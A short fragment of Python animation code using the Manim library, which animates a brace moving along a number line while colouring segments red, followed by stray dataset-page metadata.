brace = Brace(Mobject(
*number_line.submobjects[:2]
))
self.add(number_line)
for n in range(0, 10, 2):
if n == 0:
brace_anim = GrowFromCenter(brace)
else:
brace_anim = ApplyMethod(brace.shift, 2*RIGHT)
self.play(
ApplyMethod(
number_line.set_color,
RED,
lambda p : p[0] > n-6.2 and p[0] < n-4 and p[1] > -0.4
),
brace_anim
)
| 30.62312
| 134
| 0.555474
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.